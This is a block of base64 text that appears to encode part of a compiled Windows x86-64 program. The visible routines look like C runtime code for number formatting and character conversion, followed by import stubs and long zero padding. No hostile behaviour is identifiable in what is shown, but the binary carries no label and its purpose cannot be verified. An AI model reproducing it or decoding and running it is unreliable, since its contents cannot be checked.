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D/Jfp6AACQkP8l6noAAJCQ/yXaegAAkJD/Jcp6AACQkP8lunoAAJCQ/yWqegAAkJD/JZp6AACQkP8linoAAJCQ/yV6egAAkJD/JWp6AACQkP8lWnoAAJCQDx+EAAAAAADp+2z//5CQkJCQkJCQkJCQ//////////8gqEAAAAAAAAAAAAAAAAAA//////////8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFCoQAAAAAAAAAAAAAAAAAD//////////wAAAAAAAAAA/wAAAAAAAAAAAAAAAAAAAAIAAAAA